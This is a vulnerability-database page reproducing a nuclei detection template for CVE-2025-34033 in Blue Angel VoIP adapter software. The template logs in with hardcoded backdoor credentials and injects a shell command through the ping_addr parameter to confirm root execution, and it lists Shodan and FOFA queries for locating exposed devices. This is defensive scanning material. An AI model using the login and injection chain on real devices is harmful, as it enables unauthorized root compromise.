Lucene search
+L

Blue Angel Software Suite (5V Technologies) - OS Command Injection

🗓️ 24 Sep 2026 06:27:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Authenticated OS command injection in Blue Angel Software Suite via ping_addr parameter.

Related
Refs
Code
id: CVE-2025-34033

info:
  name: Blue Angel Software Suite (5V Technologies) - OS Command Injection
  author: princechaddha,ritikchaddha
  severity: high
  description: |
    Blue Angel 5V Technologies Blue Angel Software Suite through 20230920, as used in Analog Telephone Adapter (ATA) and Voice over IP (VoIP) devices, allows remote authenticated attackers to execute arbitrary OS commands as root via shell metacharacters in the ping_addr parameter to webctrl.cgi?action=pingtest_update.
  impact: |
    Remote attackers with access to the management interface can authenticate using hardcoded backdoor credentials and execute arbitrary OS commands as root on the embedded Linux device, enabling full system compromise including credential exfiltration, backdoor installation, and network pivoting.
  remediation: |
    Change default credentials, block management ports (e.g. 9000), update firmware, and restrict admin access to trusted networks.
  reference:
    - https://www.exploit-db.com/exploits/46792
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34033
    - http://www.5vtechnologies.com
  classification:
    cve-id: CVE-2025-34033
    cwe-id: CWE-78
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
  metadata:
    max-request: 3
    vendor: 5vtechnologies
    product: blue_angel_software_suite
    verified: true
    fofa-query: 'title="Analog Telephone Adapter" && server="mini_httpd"'
    shodan-query: 'http.title:"Analog Telephone Adapter" http.headers:"mini_httpd"'
  tags: cve,cve2025,rce,cmdi,iot,kev,blueangel,voip,authenticated

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        part: body
        words:
          - "/cgi-bin/webctrl.cgi?action=index_page"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webctrl.cgi?action=login_authentication&redirect_action=sysinfo_page&login_username=blueangel&login_password=blueangel&B1=Login"

    matchers:
      - type: regex
        part: header
        regex:
          - "Set-Cookie:.*sesskey=sess[a-f0-9]+-blueangel"
        internal: true

    extractors:
      - type: regex
        name: session
        part: header
        regex:
          - "sesskey=[^;\\s\\r\\n]+"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1%3Bid&B1=PING"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid=0(root)"

      - type: word
        part: body
        words:
          - "round-trip"
# digest: 4a0a00473045022100ab5f7ffa6c29b0964452d19bd95f266c9ffcc5d4a8ece7ba1b1ed799ba56c3b5022032e932373c0b6b24586d5dd598cd4ba41c33cae99978e38d61e0b26c23b16036:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2026 12:31Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.18.8
CVSS 47.7
EPSS0.03873
SSVC
4